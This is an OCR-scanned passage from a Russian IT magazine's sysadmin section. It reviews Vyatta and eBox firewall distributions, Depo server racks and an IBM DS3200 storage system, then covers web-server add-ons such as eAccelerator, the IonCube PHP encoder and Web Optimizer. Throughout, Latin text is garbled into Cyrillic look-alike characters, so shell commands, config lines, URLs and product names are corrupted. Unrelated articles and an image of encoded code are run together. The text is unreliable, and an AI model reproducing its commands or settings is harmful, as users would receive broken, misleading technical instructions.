раз нажимаем ОК и процедура заверше- 
на. Далее идут первичные настройки — 
раскладка, Ьозгпате и выбор политики 
исходящего трафика: 

• Ореп — весь исходящий трафик разре- 
шен; 

• НаІБОреп — разрешено подключение 
только по основным портам, потенциаль- 
но опасные соединения блокированы; 

• Сіозеб — все исходящие соединения 
блокированы. 

Затем настраиваем тип сети. Предлага- 
ется несколько комбинаций интерфей- 



сов и типов соединений (СКЕЕЫ + КЕБ, 
СКЕЕЫ + КЕБ + ОКАЫСЕ и т.п.) После 
чего распределяем сетевые устройства по 
назначению, указываем адреса интер- 
фейсам (где нужно) и адреса шлюза и 
БЫЗ-сервера. Указываем пароль для поль- 
зователей гоог и абтіп. После перезагруз- 
ки для дальнейших установок вызываем 
браузер и набираем 1шр://ір-адрес:81/ 
или Ьі:і:р5://ір-адрес:441. 

Веб-интерфейс не локализован, но 
достаточно прост. Выбираем одну из 
основных вкладок (Сопігоі, АЬоиІ:, 
Зегѵісез, Ыеі:ѵѵюгкіп§, ѴРЫ, Ьо§5, 

Тооіз, Маіпгепапсе) и получаем до- 
ступ к настройкам. По умолчанию 
5погі: не активирован, необходимо 
перейти в Зегѵісез -> ІБ5, установить 
флажок «5погГ» и ввести «Оіпк собе». 
Настройки правил брандмауэра 
производятся в НеГѵѵогкіп^, выбира- 
ем нужное направление (например, 
оиг^от^) и заполняем предложенные 
поля. Использование АЗАХ позволяет 
админу просматривать графики за- 
грузки каналов в реальном времени 
(вкладка АЪоиг). Доступна статисти- 
ка трафика по любому ІР-адресу, за 
любой период времени. Обновление 
дистрибутива производится нажа- 
тием одной кнопки в Маіпгепапсе -> 
Брбагез. 

ѴУАТТАС0ММІЖІТѴЕ0ГП0М 5.0.2 
САЙТ ПРОЕКТА: ѵѵѵѵѵѵ.ѵуаиа.огд 
ДАТА ВЫХОДА: 9 марта 2009 года 

ЛИЦЕНЗИЯ: 6РЬ 

АППАРАТНЫЕ ПЛАТФОРМЫ: х86_32 
СИСТЕМНЫЕ ТРЕБОВАНИЯ: ІпШРепІіиш III 
450 МГц, 128Мб ОЗУ и 2 Гб, 2+ N10 

Разработчики дистрибутива Ѵуапа ре- 
шили составить конкуренцию не кому- 
нибудь, а самой СІ5СО Зузгетз. Взяв за 
основу ВеЫап, они интегрировали его со 
свободно распространяемой платформой 
маршрутизации ХОКР (еХгепзіЫе Ореп 
КоіПег РІаНогт, хогр.ог^) . разработ- 
кой которой занимается группа в ІС5І 
(Іпгегпагіопаі Сотріиег Зсіепсе ІпзНшіе) 
Беркли. Установив Ѵуана на х86 компью- 
тер, получаем маршрутизатор с функция- 
ми ІВЗ/ІР5 (5погг), кэширующий прокси 
и фильтр ІЖБ (5циіб + 5цііібСііагб), сете- 
вые политики (ЫеГѵѵюгк Ассезз Роіісіез), 
ОрепѴРЫ, БЫ5 Еопл/агбіп§, ЕгЬегпег 
Вопбіп§ и Вгіб^еб ЕгЬегпег оѵег АБ5Б (НЕС 
2684). Поддерживаются мультипортовые 
карты (Т1/Е1, ТЗ и др.) и беспроводные 
ЗС-модемы. 

Первые версии Ѵуапа настраивались 
исключительно посредством коман- 
дной строки (как маршрутизаторы 
Сізсо) . С версии 4 стал доступен веб- 
интерфейс (для этих целей в состав 



включен Іі^ііггрб) . Особо подчеркива- 
ется поддержка популярных сегодня 
виртуальных машин — ѴМѵѵаге, Хеп, 
Нурег-Ѵ и некоторых других гиперви- 
зоров. Дистрибутив может работать 
с БіѵеСВ с сохранением настроек на 
флешку или другой носитель (файл 
сопП^.Ъоог) . Возможна установка на 
хард, ІІ5В-брелок или карту Сотрасг 
ЕІазЬ. При наличии двух дисков уста- 
новщик позволяет их автоматически 
связать в КАІВ 1. 

Проект предлагает коммерческую 
поддержку и продает роутеры с предуста- 
новленным ПО. Для свободной загрузки 
и использования доступна версия Ѵуапа 
Соттипігу Ебігіоп (150, образы Сіггіх 
ХепЗегѵег и ѴМѴѴаге) . 

Процесс установки достаточно прост, 
хотя и производится при помощи 
командной строки. Регистрируемся 
как гооі: с паролем ѵуагга и запускаем 
инсталлятор: 

# іпзБаІІ-зузБет 

Далее приступаем к созданию разделов. 
По умолчанию стоит Аиго. Введя «Уез», 
подтверждаем уничтожение данных 
на диске, указываем размер корневого 
раздела (по умолчанию весь диск) и 
ждем, пока скопируются данные. Затем 
устанавливаем пароли пользователей 
гоог и ѵуагга, водружаем СРШВ, после чего 
перезагружаемся и переходим в режим 
конфигурирования: 

# сопіідиге 

Настраиваем сетевой интерфейс: 

# зеБ іпЬегІасез еБйегпеБ еЫтО 
аббгезз 192.168.1.1/24 

# зеБ іпііегіасез еГ:Ь.егпе1і еБЪ.0 
безсгірБіоп ЬАК 

Включаем веб-интерфейс: 

# зеБ зегѵісе йББрз 

Аналогично включаются и остальные сер- 
висы — паг, б П5, бйср-геіау, бйср-зегѵег, 
ѵѵеЬргоху, ззЬ.. В консоли доступно авто- 
дополнение: нажимая <ТаЬ>, получаем 
список возможных значений. Подтверж- 
даем все установки: 

# СОШШІІІ 

Смотрим, что получилось: 

# збом ігЩегІасез 

Все настройки можно вывести, набрав 
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К ОСОБЕННОСТЯМ ВЕБ-ИНТЕРФЕЙСА ѴѴАТТА СЕ 5 ПРИДЕТСЯ ПРИВЫКНУТЬ 



зйоѵѵ-аіі. Выходим из режима редактирования по команде ехй. 
Теперь вызываем браузер и настраиваем параметры при помо- 
щи веб-интерфейса. Выбираем нужную категорию и нажима- 
ем кнопку Сгеане, после чего заполняем предложенные поля. 
Кнопка ЗЬоѵу в самом верху покажет конфигурационный файл, 
в котором знаком « + » будут подсвечены добавленные, но еще 
не активированные параметры. Чтобы привести их в действие, 
нажимаем кнопку Соттіі: (отмена — Оізсагсі). 

На мой взгляд, чем настраивать аналогичное разрешающее 
правило при помощи предлагаемого веб-интерфейса, проще 
ввести в командной строке: 

# зеЬ гема 11 паше аііом гиіе 10 асЫоп ассеріі 



# зеЬ Іігемаіі паше аііо м гиіе 10 зошгсе аскігезз 
192 . 168 . 0 . 0/24 

# зеЬ іпЬегІасез еЫіегпеІ: еЬЬО Іігемаіі іп паше аііом 

# соішпіі: 

Нужно только немного привыкнуть к новому синтаксису. 

ЗАКЛЮЧЕНИЕ 

Победителя каждый выберет себе сам, исходя из конкретных 
задач. Мне лично нравится Ѵуапа за гибкость и Сізсо-подобные 
команды, Епсііап Еігеѵѵаіі и ІІпі:ап§1е — за оснащенность. Если 
тебе нужна простота в настройках, присмотрись к ЗтоогІіѴѴаІІ 
и ІРСор. Ц-Ц 



Все в одном — 
еВох РІаКогт 

еВох Гѵѵѵуѵу.еЬох-рІаііГогт.сот') отличается отрешений, ориентиро- 
ванных исключительно на построение защищенного шлюза. Сами 
разработчики еВох определяют назначение как «Ореп зоигсе зтаіі 
Ьизіпезз зегѵег», поэтому и возможностей у него на порядок больше. 
еВох присущи все функции предоставления доступа в интернет и 
ЕГГМ-решения. Кроме того, в его состав включены все компоненты, 
затребованные в сетях малого и среднего бизнеса — ЗатЬа, ІаЪЪег/ 
ХММР, почтовый (Розіііх/Ноѵесоі:) и веб-сервер (с поддержкой 
виртуальных доменов), приложение групповой работы еСгоирѵѵаге 
(календарь, контакты, веб-почта и т.п.), ѴоІР Азнегізк. Все это допол- 
нено компонентами аутентификации пользователей, мониторинга, 
отчетов и удобным локализованным веб-интерфейсом управления. 
В процессе установки администратор самостоятельно выбирает 
необходимые компоненты. Основой последней версии еВох 1.2 
является ЦЪипш Зегѵег 8.04, с которым он полностью совместим по 
пакетам. 




ЕВОХ — ДОВОЛЬНО ОСНАЩЕННОЕ РЕШЕНИЕ 
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5ѴМ/АСК 



I ЫАТНАЫ ВІІЧКЕРТ ЫАТ05ѴЫАСК.ВІІ 




На полу и нясуГене 





Раск 6506 и РаскбооѴѴ: 
серверные шкафы от компании Беро 





Технические характеристики 
йЕРО Раск 6506 

> Размеры: 

Ширина — 650 мм 
Глубина — 1 000 мм 

Высота — 42В (шкафы другой высоты или 
цвета — под заказ] 

> Особенности: 

Вертикальные 19" профили — 4 шт 
Кабельные вводы — щеточные 8 шт 
Макс, нагрузка — 900 кг 



дние профили, регулируемые по глубине 
Стеклянная дверь с замком и комплектом 
ключей 

Максимальная нагрузка — 60 кг 
Поставляется в собранном виде 

>Материал: 

Корпус — сталь #1 ,5мм 
Профили — сталь #1 .5 мм 
Дверь — сталь #1 .5 мм 



> Материал: 

Рамы — сталь #1.5, 2. 0мм (профили, пере- 
кладины соответственно) 

Боковые панели, верхняя заглушка — сталь 
#1.0 мм 

Двери, фальш-крыша, вентиляционная па- 
нель, панель с фильтрами — сталь #1 .5 мм 
Нижние перекладины — сталь #2.0 мм 
Варианты поставки передних дверей — ме- 
таллостеклянные 

Технические характеристики 
йЕРО КаскбооѴѴ 

> Размеры: 

Ширина — 600 мм, глубина — 600 мм, стан- 
дартная высота — 121) 

Шкафы другой высоты или цвета — под заказ 

Особенности: 

Вертикальные 19" профили — 4 шт., пере- 




Сегодня под зоркий глаз рубрики Ш БА 
РОСИ5 угодили сразу два серверных шка- 
< фа: напольный Каск 6506 и настенный Каск 

> 600ѴѴ. Оба произведены российской компа- 

й нией Беро, чье оборудование не раз попада- 

ло на страницы т . 

Каск 6506 — классический серверный 
шкаф высотой 42И. Среди отличительных 
особенностей можно отметить максималь- 
ную нагрузочную способность в 900 Кг, 
возможность простого демонтажа дверей 
и боковых панелей, обширное кабельное 
пространство, возможность регулировки 
19 м профилей под любое оборудование, 
удобство подводки кабелей с 4-х сторон че- 
рез щеточные вводы пола и потолка. Шкаф 



выполнен из стали со стеклянной дверцей 
с замками. 

Опционально Каск 6506 может быть ос- 
нащен множеством дополнительных 
аксессуаров, таких как платформа на 6 
вентиляторов, полки для шкафов глуби- 
ной 1000 мм, консоль управления, КѴМ- 
коммутатор, панель электропитания, 
фальш-панель, панель освещения, тер- 
мостат, крепежные комплекты, система 
бесперебойного питания и другое. В ми- 
нимальной конфигурации со сроком га- 
рантии в 1 год цена на шкаф составляет 
44 123 рублей. 

Каск 600ѴѴ — настенный шкаф высотой 
12И — будет удобен, когда установка боль- 



шого количества оборудования не требует- 
ся. Эта модель выполнена из листовой стали 
толщиной 1 . 5 мм с дверью из тонированного 
закаленного стекла в стальной раме. Днище 
и крыша шкафа перфорированы для более 
эффективной вентиляции. Шкаф может 
быть установлен на пол или смонтирован 
на стене. Набор опциональных аксессуаров 
включает в себя: панель электропитания, 
кабельный органайзер, крепеж, патч-пане- 
ли. Цена шкафа: 9 795 рублей. 

Поверхности серверных шкафов окрашены по 
порошково-полимерной технологии тексту- 
рированной черной ВАЬ 9005. Другие цвета 
покрытия (согласно каталогу ВЛІ) — по спе- 
циальному заказу. 
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Дисков много не бывает 



ІВМ Бузіет Біогаде Р53200: 
внешняя система хранения данных 



Технические характеристики 
ІВМ БуБІет Біогаде 053200 

> Модели: 

1 726-21 X — один контроллер 

1 726-22Х — два контроллера 

1726-22Т — два контроллера (данная модель 

разработана для телекоммуникационной 

отрасли] 

1 726-21 Е — один контроллер, Ехргезз 
1 726-22Е — два контроллера, Ехргезз 

> Контроллер КАШ: 

Два активных устройства 

> Кэш-память одного контроллера: 

Кэш -па мять объемом 51 2 Мб с резервным 
питанием от аккумулятора и возможностью 
увеличения до 1 Гб 

>Уровни КАШ: 

РАЮ 0,1,3,5,6,10 

> Внешний интерфейс: 

1 или 3 хост-порта для одного контроллера, 
5А5 3 Гбит/с 

> Поддерживаемые диски: 

Поддержка жестких дисков 5А5 со скоро- 
стью 3 Гбит/с и частотой вращения 10000 
или 1 5 000 оборотов в минуту, а также БАТА 3 
Гбит/с (7200 об/мин) 



> Максимальное количество жестких дисков: 

до 1 2 жестких дисков БАБ и БАТА (3.5") 
до 48 жестких дисков при использовании 
трех блоков расширения ЕХР3000 

> Источник питания: 

Два блока питания с возможностью «горя- 
чей» замены 

> Поддержка установки в стойку: 

Форм-фактор 211, 1 9" 

> Размеры: 

Высота: 8.7 см 
Глубина: 55 см 
Ширина: 44.7 см 

Вес: примерно 17.2 кг для стандартной 
конфигурации, 29.2 кг для макси- 
мальной конфигурации 



> Тепловыделение: 

Минимальная конфигурация: 60 Ватт 
Максимальная конфигурация 361 Ватт 

Управляющее ПО: 

ІВМ Бузует Біогаде 053000 Біогаде 
Мападег 

Особенности: 

Поддержка функций ІВМ ЕІазЬСору 
(резервное копирование в определенный 
момент времени) и Ѵо Іи теСо ру (ко пирова 
ние тома] 

Гарантия: 

Трехлетняя гарантия на комплектующие и 
сборку 




Бузует Біогаде Б53200 — это внешняя сис- 
тема хранения данных для малых и средних 
< предприятий от компании ІВМ, которая 
> характеризуется доступной ценой и боль- 
й шой емкостью хранилища. ЭБ3200 — пре- 
восходное решение для быстрорастущих 
компаний, потребности которых в объемах 
дисковых хранилищ постоянно возрастают. 
Она не только позволит подготовить ІТ-ин- 
фраструктуру к росту, но и обеспечит более 
надежное хранение информации. 

083200 выполнена в форм-факторе 211 и 
предназначена для монтажа в 19" стойку. 
На ее передней панели расположены 12 
отсеков для жестких дисков с интерфейсом 
5АБ/БАТА и возможностью «горячей заме- 



ны», так что даже в стандартной конфигу- 
рации общая емкость хранилища может 
составлять 3.6 Тб (диски емкостью 300 Гб). 
При подключении же модулей расширения 
ЕХР3000 (до 3-х шт.) общая емкость может 
достигать 14.4 Тб. Система использует два 
активных КАГО-контролл ера с 5 1 2 Мб памя- 
ти и резервным питанием от аккумулятора, 
поддерживает уровни НАГО 0, 1, 3, 5, 6 и 10. В 
качестве интерфейса подключения можно 
задействовать от одного до трех портов БАБ, 
что позволяет использовать систему хране- 
ния сразу тремя серверами без потери про- 
изводительности. 

Для управления системой служит Э53000 
Біогаде Мапа§ег, обладающий удобным 



графическим интерфейсом настройки и ад- 
министрирования. Это программное обес- 
печение очень легко для понимания и не 
требует дополнительных знаний о системах 
хранения, поэтому с настройкой справится 
даже администратор-новичок. 

Бузіет Біогаде 083200 соответствует стан- 
дартам питания ХЕВБ и Европейского инс- 
титута телекоммуникационных стандартов 
(ЕТБІ). Специальный вариант системы под 
названием Теісо разработан для примене- 
ния в телекоммуникационной отрасли и 
поддерживает источники питания постоян- 
ного тока с напряжением -48 В. 
Ориентировочная стоимость: 

88 000 рублей. 
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ЗУИ/АСК 



■ ■ ЕВГЕНИЙ ЗОБНИН ЛМгаЗѴЫАСК.Ри 



Остаться 
на плаву 

ОБВЕСКИ ДЛЯ ѴѴЕВ-СЕРВЕРА, БЕЗ КОТОРЫХ НЕ ОБОЙТИСЬ 

Сегодня ѴѴеЬ-серверы играют важнейшую роль в интернет-инфра- 
структуре. На них держится все, начиная с сайта Марины Петровны с 
посещаемостью 3 человека в месяц и заканчивая высоконагруженны- 
ми проектами УоиТиЬе и Тѵѵіиег. От производительности и безопасности 
ѴѴеЬ-серверов во многомзависитконкурентоспособностьсервиса, но 
чтобы выжать из сервера все, недостаточно одной только тонкой на- 
стройки Арасбе и РНР. 



ЕАССЕЬЕРАТОК Исполнение РНР-скриптов 
очень сложная задача, создающая огромные 
нагрузки на ѴѴеЬ-сервер. По сути, именно 
разбор скриптов зачастую является наиболее 
затратным процессом, происходящим на 
машине, где крутится сервис. При этом не все 
ѴѴеЬ-дизайнеры и программисты знают, что 
процесс исполнения РНР-кода (как, впрочем, и 
кода на любом другом современном интер- 
претируемом языке) состоит из двух этапов: 
трансляция кода РНР в байткод виртуальной 
машины и непосредственное исполнение 
байткода. 

Первая операция в большинстве случаев более 
сложна и ресурсоемка, чем вторая, поэтому 
разумнее хранить прекомпилированный 
РНР-байткод в кэше и запускать на исполнение 
именно его, пропуская процедуру трансляции. 
К сожалению, стандартный интерпретатор РНР 
не позволяет проделывать такое, поэтому уже 
давно существует несколько проектов по созда- 
нию РНР-ускорителей, наиболее производи- 
тельный из которых носит имя еАссеІегаГог. 
еАссеІегаЮг Геассеіегагог.пеіі) — это РНР-ус- 
коритель, основанный на коде проекта Тигск 
ММСасЬе Г зоигсебогуе.пеіі/ргоіесЩ/Шгск- 
ттсасйе) . Он не только кэширует РНР-код 
в виде байткода, но и производит его опти- 
мизацию, позволяет хранить кэш на диске и 
обладает развитой системой настроек. 
еАссеІеганог распространяется в виде РНР- 
модуля, но доступен в репозиториях далеко не 
всех дистрибутивов, поэтому мы установим 
его из исходных текстов. Для этого получим 
последнюю стабильную версию модуля: 



$ ссі ~/бтр 

$ мдеб Ыгбр : //Ъагб . еассеіегабог . 
пеб/зоигсе/О . 9 . 5 . 3 /еассеіегабог- 
0 . 9 . 5 . 3 . баг .622 

$ баг -хз б еассеіегабог- 0 . 9 . 5 . 3 . баг . Ъг2 
$ ссі еассе 1 егабог -0 . 9 . 5.3 

Установим пакеты, необходимые для сборки 
ПО из исходников (§сс, Ъіпигііз и т.д.) : 

$ зисіо арб-деб іпзбаіі Ьиііб- 
еззепбіаі 

Также нам понадобится пакет рйр-сіеѵеі (рйрБ- 
беѵеі), содержащий утилиту рііріге: 

$ зисіо арб-деб іпзбаіі рйр 5 -сіеѵе 1 

Запускаем процесс сборки: 

$ ехрогб РНР_РКЕЕІХ=" /изг" 

$ $РНР_РКЕЕІХ/Ъіп/р1ірІ2е 
$ . /сопбідиге \ 

--епаЫе-еассе1егаРог=зііагесі \ 
--■\лібП-р]тр-сопбід=$РНР_ 
РКЕЕІХ/Ъіп/рЬр-сопбід 
$ таке 

$ зисіо таке іпзбаіі 

Узнаем местоположение файла рЬр.іпі (в разных 
дистрибутивах он находится в разных местах) : 

$ ркр -і | дгер ркр.іпі 

И добавляем в него следующие строки: 



$ зисіо ѵі /еІс/рНр5/арасІіе2/рІір.іпі 

ехбепзіоп= "еассеіегабог. зо" 

//В дисковом кэше будут храниться 
данные сессий, контент и прекомпили- 
рованный код 

еассеіегабог . сасПе_с1іг= " /бтр/ 
еассеіегабог" 

// Включаем еАссеІегабог (данная 
опция может быть полезна, если нужно 
отключить кэширование для одного или 
нескольких виртуальных хостов , при- 
мер: "ркр_асітіп_ѵа1ие еассеіегабог. 
епаЫе 0" в соответствующей секции 
ѵбюзб конфига МеЪ- сервера) 
еассеіегабог . епаЫе= " 1 " 

// Включаем оптимизатор, который по- 
может ускорить выполнения кода 
еассеіегабог . орбітІ2ег= " 1 " 

// При каждом обращении проверяем 
время модификации скрипта, чтобы оп- 
ределить, нуждается ли он в переком- 
пиляции или нет 
еассеіегабог . сііеск_тбіте= " 1 " 

// Отключаем журналирование отладоч- 
ной информации 
еассеіегабог . беЬид= " 0 " 

//С помощью этой директивы можно 
определить, какие РНР -файлы могут 
быть кэшированы (например, " *.ріір 
* . ріібті " ) , задаем все : 
еассеіегабог. бі1бег=" " 

// Количество памяти ( зПагесі 
тетогу) , выделяемой для кэширования 
РНР-скриптов 

еассеіегабог . зЬп_зІ2е= " 16 м 
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еассеіегаког . зЬт_тах= " 0 " 
еассеіегаког . зЬт_бб1= " 0 " 
еассеіегаког . зЬт_ргипе_регіоб= " 0 " 
еассеіегаког . зЬт_оп1у= " 0 " 

// Устанавливаем максимальный уровень сжатия для контен- 
тного кэширования 
еассеіегабог . сошргезз= " 1 " 
еассеіегабог . сошргезз_1еѵе1= " 9 " 

Создаем каталог для файлов кэша: 

$ тксііг /ктр/еассеіегаког 
$ сіітоб 0777 /ктр/еассеіегаког 

Перезапускаем арасЬе: 

$ зибо /ебс/іпіб . б/арасЬе2 гезбагб 

Вот и все. Теперь можно выполнить замер производительности. Разра- 
ботчики утверждают, что ее прирост может достигать 10-ти раз, однако 
по личному опыту могу сказать, что зачастую эта цифра становится еще 
выше. 

ІОЫСЦВЕ РНР Е N СО й Е Р Идея хранения и запуска байткода вместо 
оригинального РНР-кода открывает одну интересную возможность: 
сокрытие исходного кода. Транслировав РНР-код в байткод, мы не толь- 
ко получим прирост производительности, но и существенно усложним 
процесс исследования и модификации кода. 

Сразу оговорюсь : несмотря на то, что еАссеІегаШг и другие аналогич- 
ные по функциональности системы и позволяют осуществить трансля- 
цию в байткод, использовать их для защиты РНР-приложения довольно 
наивно. Стандартная виртуальная машина языка РНР проста, хорошо 
документирована и не скрывает то, что скрывать бессмысленно, 
поэтому восстановить изначальный РНР-код из байткода или изменить 
поведение приложения будет достаточно просто. 

Для установки настоящей, стойкой защиты на РНР-скрипты при- 
нято применять протекторы, наиболее известные из которых 
называются 2епб ОрНтігег и ІопСиЬе РНР Епсобег. Первый — 
это платный проект разработчиков РНР, защитные техники 
которого однажды уже показали свою нестойкость (в результа- 
те доверие к продукту упало) . Второй разрабатывается компа- 
нией ІопСиЬе, обладает в три раза меньшей ценой и использует 
гораздо более изощренные техники сокрытия оригинального 
кода. Ему и будет посвящена остальная часть раздела. 

Основные характеристики ІопСиЬе РНР Епсобег: 



• Трансляция РНР-скриптов в байткод (спецификации кото- 
рого закрыты) . 

• Шифрование других типов файлов (например, ХМЬ, шаблоны 
Зшагбу, изображения) . 

• Генерация лицензионных файлов для ограничения доступа 
к закодированным файлам (Рго/СегЬегиз Епсобег) . 

• Обфускация байткода после компиляции. 

• Возможность получать файлы форматов АЗСІІ или Віпагу. 

• Использование цифровых сигнатур для защиты скриптов от 
модификации . 

• Защита от вызова закодированных файлов из неавторизо- 
ванных файлов . 

• Совместимость с открытыми расширениями, такими как 
шшсасЬе и еАссеіегабог . 

• Возможность создания триальных скриптов, которые пере- 
стают работать после истечения определенного срока (Рго/ 
СегЬегиз Епсобег) . 

• Защита файлов от запуска на машинах с определенными ІР/ 
МАС-адресами и БШЗ-именами (Рго/СегЬегиз Епсобег) . 

• Интеграция с ІопСиЬе Раскаде Еоипбгу. 

• Возможность вставки текстовых аннотаций и других дан- 
ных в закодированные файлы. 

• Чрезвычайно быстрое кодирование (благодаря чему воз- 
можно кодирование на лету) . 

ІопСиЬе транслирует РНР-код в байткод для собственной виртуальной 
машины, проводит оптимизацию, обфускацию, шифрует легко читае- 
мые участки. При этом для исполнения байткода применяется ІопСиЬе 
РНР Ьоабег, включающий в себя виртуальную машину, и потому необ- 
ходимый везде, где должен быть запущен закодированный РНР-скрипт. 
Для восстановления кода, зашифрованного РНР Епсобег, взломщику 
придется вслепую произвести дизассемблирование байткода вирту- 
альной машины (естественно, ни документации, ни исходного кода 
ВМ никто ему не даст), затем расшифровать зашифрованные данные, 
разобрать и подчистить код от обфускации и только после этого попы- 
таться восстановить исходный РНР-код. При этом, даже если взломщик 
попытается просто изменить код (например, для отключения проверки 
на регистрацию) , приложение перестанет функционировать из-за 
несовпадения контрольной суммы в цифровой подписи. Тогда придется 
менять и ее. 

Не возьмусь говорить, что взломать РНР-скрипты, закодированные 
РНР Епсобег, невозможно, но это как раз тот случай, когда затраты не 
окупают результатов. 

ІопСиЬе РНР Епсобег доступен в виде триальной версии, которую мож- 
но получить, следуя инструкциям, опубликованным на странице 
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5ѴМ/АСК 




ДОМАШНЯЯ СТРАНИЧКА ЕАССЕІ.ЕКАТОР 



ѵѵм/ѵѵлопсиЪе.сот/епсобег еѵаі боѵѵпіоаб.ріір . Для установки доста- 
точно выполнить пять шагов: 

1 . Зарегистрироваться и скачать последнюю версию РНР Епсосіег. 

2. Распаковать полученный архив и скопировать загрузчик в каталог 
РНР-модулей (он может быть другим) : 

$ ссі ~/бтр 

$ баг -хгб іопсиЪе_епсобег_еѵа1иабіоп . -Саг . дг 
$ ссі іопсиЪе_епсобег_еѵа1иабіоп 

$ зибо ср 1оасіегз/іопсиЬе_1оасіег_1іп_5 . 3 . зо /изг/ІіЬ/ 
рПр5/20060613+1бз/ 

3. Добавить в секцию [РНР] файла рйр .іпі строку: 

2 епб_ехбепзіоп = /изг/1іЪ/рПр/тоби1ез/іопсиЪе_1оабег_ 
1іп_5 .З.зо 

4 . Перезапустить индейца: 

$ зисіо /ебс/іпіб . б/арасЬе2 гезбагб 

5 . Закодировать файлы с помощью команды іопсиЪе_епсосіег5 (или 
просто іопсиЪе_епсосіег в случае РНР4) : 

$ ~/бтр/іпсиЪе_епсобег5 --оЪбизсабе аіі оригинал . рПр \ 

-о закодированный_скрипт . рЪр 

Больше информации об аргументах командной строки іопсиЬе_епсосіег 
ты узнаешь из официального руководства пользователя. 

ѴѴЕ В О РТІ М І2Е В Любой ѵѵеЪ-дизайнер, разработчик или системный 
администратор, хоть раз занимавшийся оптимизацией содержимого 
веб-сайта, знает, что этот процесс требует применения множества 
самых различных техник и времени, которое приходится тратить на 
рутинные, однообразные действия. Большую часть этих действий, 
конечно, можно оптимизировать с помощью скриптов и шаблонов кон- 
фигурационных файлов, однако различные СМ5 и \УеЪ-сервера могут 
внести в подход различия, скрипты придется дорабатывать, а конфиги 
переписывать. 

Наверное, именно такие мысли посещали головы российских ѵѵеЪ- 
разработчиков из ООО «ВЕБО» незадолго до того, как они приступили 
к разработке автоматизированной системы оптимизации контента. В 
результате их работы появился ѴѴеЪ Орйтігег (собе. ^оо Де. сот/р /ѵѵеЪ- 
орйтігаіог) — набор РНР-скриптов, которые выполняют всю рутинную 
работу по оптимизации контента ѴѴеЪ-сайта на лету. 



с?рЬр п 08337 

( I ея*егк5І<т_І0дгіеЩ 1 іопСи Ь« боа*!*!*' ) осща*гіс1оиег(еивБіг(рНр_игсат*П #8 

: г - , /мпсиЬе/1опсиЬе_1оа^ег_' .$ і 6 . 0,Ѳ,3).И$ 

► ОС— '«ІП 1 ) ?' ♦СПЛЛ 1 1 ► 30 1 ) ; $ Ш«гва,1ра1;Н(іпі_дгі( н вХІвПЗІОП_СІІ Г ' ) ) ;$ 

* Ьегеис)ітате( РІЕЕ ) ;і+і| [1] ) *=' : *){$, ігі-5і:г_гер1асе( Ч\' , 1 / ' , 

г{$ М,2) ) 1$ Неге«й1: Г_гер1асе^ н \\' , */* ,5иЬ$*г($ Неге ,2) ) >}$ ггі-5І;г_гер 

і-еаг (■*/*. И *зиЬзР г_соипі: ( $ */*})■ 5 Ье ге . */ ' ; $ і-5Г гіеп гчі) ;иЫ1е ( $ і 

► - - ) {ІЛ ( $ гд [$ і1"‘ / * ) 1ри5иЬ5^ гСІ і) . $ 1гц Щ 

1р)Н$ 1п<-$ 1р;Ьгеак;}}}фЛ 1п) ;>в\за{всНо( ’ТЬв іі1в 1 - РІІ.Е . 

** іа соггиріе4Лп* ) ; геіи т Ѳ;}і?(і+псі:іоп_вих5І:5( ^і^екес' ) Нгеиігп 

(■сО ;}всЬо( 'ТЬЙ епсосіесі ГіІ« саппоі Ье гип. Ріваве гип г И в Шіе іопсиЬв'Іоасі 

<-ег-Ье1реГьрНр тоге іпбогяаііоп. 1 ) *ге*игп Ѳ; 

?> 

4+ОѴ5ЕЭ* І1 СОСглго уКус ур й 1=гіЫЕ ѴКс од ш іМОдіЗміт Ѵ05тМ Ѵеоі грПѴ1зЬ22$37 ѴиУОМ уДХу 
^ БтЕдХВОУЭ иВОМ ВЗЭРр ’РУрО ивН2и уЬР4еоу 5 Ь3д5 ХК36К0ѴН2 ООЕ5 47ѴІа 4нЛі РУ д67 210а хЕ іг>г 
4докК4у^ т д У/ у 74+ЭпОчОх ѵ8$е /ЗОРИР /КЕу 9С7д[357АМСіі 16 7 Н дЬ і Ш 

ГКМЭКр ХЭДУ зкир ЬИ* 3 у ІМН7 7а0 і гѴ/9Х В 2еА 3 у хдгі/Т5а5+ЕХѴ І7аи6пр 22 ЮЬЬ ееа д СіЖЙѵЛ^РВХ 9 
^еѵ-е 2Ѵ гі5абТН$Ѵ++ 2С 4гЕх Й г ІК7Р МЬ 2ѵ УВРА Ѳ ІИН8 $0 іѴѵ4У 53 Ігиту иэтрЭЬН* дгЕйУ 

^ 2оКЬМРоУ уУаВ7 Й/+п50 Х4з 7 ѴміУрРпХ ЗеЗН 05x1 Эбр4УНно2 пННКС /+оР аЬ7У7 г 1 4иС707 Іы гЬ г 
зЭ5е2и ІР зС+ТѵГ НМ ] оЗ АоОУС\Р гуоу е+У И 7 к гч= 

ТАК ВЫГЛЯДИТ РНР-СКРИПТ, ЗАКОДИРОВАННЫЙ 
ІОЫСиВЕРНРЕЫСООЕР 



Надо сказать, система получилась весьма функциональная, она уже 
умеет делать следующее: 

• Объединение внешнего и встроенного кода . 

• Минимизация файлов (удаление из кода комментариев, не- 
значащих пробелов, символов табуляции, переносов строк с 
целью уменьшения объема файлов и ускорения их загрузки) . 

• дзір-сжатие файлов. 

• Клиентское кэширование . 

• Серверное кэширование . 

• Поддержка множественных хостов . 

• Автоматическое создание С88 Зргібез. 

• Автоматическое применение БабагІШІ. 

• Ненавязчивая загрузка йаѵаЗсгірб . 

Перефразируя авторов, можно сказать, что пользователям ѴѴеЪ 
Оргітігег больше не придется натравливать компрессор на каждый 
имеющийся ]з-файл, удалять комментарии из НТМБ-файлов и вытяги- 
вать их в одну строку, настраивать кэширование и проделывать многие 
другие рутинные операции. Все это сделает полностью автоматизи- 
рованная система, которая проста в установке и не требовательна к 
ресурсам. 

Опять же, если верить словам разработчиков (подкрепленным 
внушительной таблицей с замерами производительности), то 
среднее увеличение скорости загрузки страниц, обработанных 
ѴѴеЪ ОрНтігег, составляет примерно 250% (а в некоторых слу- 
чаях и до 500%). «Сайты ускоряются в среднем в 2,5 раза ( + 21 
в оценке УЗІоѵѵ, -34% в размере, -43% в количестве внешних 
объектов)». 

Для установки ѴѴеЪ Оргітігег следует выполнить три простых шага: 

1 . Обзавестись ѴѴеЪ-сервером с поддержкой РНР и 55Н-доступом (РТР 
тоже подойдет) . 

2. Получить последнюю версию ѴѴеЪ Оргітігег: 

$ хѵдеб Ъ+бр: / /’меЪ-орбітігабог . доодіесобе . сот/ІіІез/меЬ- 
орбітігег . ѵО . 6 . 6 . зір 

3. Распаковать архив в корневой каталог ѴѴеЪ-сервера: 

$ ссі /ѵаг/ѵллл 

$ зибо ипзір /путь/к/ѵ/еЬ-орбішізег . ѵО . 6 . 6 . гір 

